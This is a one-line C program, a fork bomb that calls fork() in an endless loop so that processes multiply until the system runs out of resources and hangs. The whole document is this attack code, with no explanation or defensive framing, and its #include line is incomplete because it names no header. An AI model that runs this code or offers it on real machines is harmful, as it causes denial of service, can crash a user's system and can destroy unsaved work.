#include int main(void) { for(;;) { fork(); } return 0; }